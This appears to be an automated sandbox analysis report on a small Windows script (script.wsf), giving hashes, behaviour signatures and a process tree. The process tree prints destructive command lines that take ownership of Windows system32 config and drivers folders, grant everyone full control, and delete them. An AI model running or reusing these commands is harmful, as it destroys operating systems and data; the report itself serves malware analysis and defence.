Analysis

  • max time kernel
    11s
  • max time network
    16s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    15-08-2024 21:44

General

  • Target

    script.wsf

  • Size

    3KB

  • MD5

    0355b976d816c3dafeda740c75450a08

  • SHA1

    98de5b1ee4c653658966effecf248bf7a8df7cd1

  • SHA256

    7786be7dadf8cf4d51607d72cdd3a7f047668c91edfbf5c0623798688d712ab7

  • SHA512

    2aa4dd903915d0f7394ebb8b802ad81d2aeda3561d94dc679b693a7e5b32a2f1bf79f0ddffb8971bd61f95b5a68d8bfbb8a5fa361f8580620ad7ab8985210779

Score
8/10

Malware Config

Signatures

  • Possible privilege escalation attempt 4 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "copy C:\Users\Admin\AppData\Local\Temp\script.wsf C:\Users\Admin\AppData\Local\Temp\script.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\script.wsf.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2576
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\script.wsf.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2756
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2760
        • C:\Windows\system32\takeown.exe
          takeown /f c:\windows\system32\config\*
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2596
        • C:\Windows\system32\icacls.exe
          icacls c:\windows\system32\config\* /grant everyone:(f)
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:3064
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2636
        • C:\Windows\system32\takeown.exe
          takeown /f c:\windows\system32\drivers\*
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:2068
        • C:\Windows\system32\icacls.exe
          icacls c:\windows\system32\drivers\* /grant everyone:(f)
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1464

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\script.wsf.vbs

    Filesize

    3KB

    MD5

    0355b976d816c3dafeda740c75450a08

    SHA1

    98de5b1ee4c653658966effecf248bf7a8df7cd1

    SHA256

    7786be7dadf8cf4d51607d72cdd3a7f047668c91edfbf5c0623798688d712ab7

    SHA512

    2aa4dd903915d0f7394ebb8b802ad81d2aeda3561d94dc679b693a7e5b32a2f1bf79f0ddffb8971bd61f95b5a68d8bfbb8a5fa361f8580620ad7ab8985210779

  • C:\Users\Admin\Desktop\desktop.vbs

    Filesize

    79B

    MD5

    edc6cfebfd829729d9fc80aaaf02d193

    SHA1

    6d04bf8c7b542301f7eb77eeceed16969053537c

    SHA256

    d0391b24b4bb809ba05a9b9e3fbee72a8b39381b16567de0ca7d9f403211cb47

    SHA512

    8afab19929d1bc3fe4d878ee7dd0b711834e53564afdf8e7d0a7186d1f01b35f5f4aeba4d3c5c964e2fbda08203611dc8bd140b717d3e579dc4b3f1684e3908c

  • C:\Users\Admin\Downloads\ReadAdd.mp3

    Filesize

    2B

    MD5

    81051bcc2cf1bedf378224b0a93e2877

    SHA1

    ba8ab5a0280b953aa97435ff8946cbcbb2755a27

    SHA256

    7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6

    SHA512

    1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d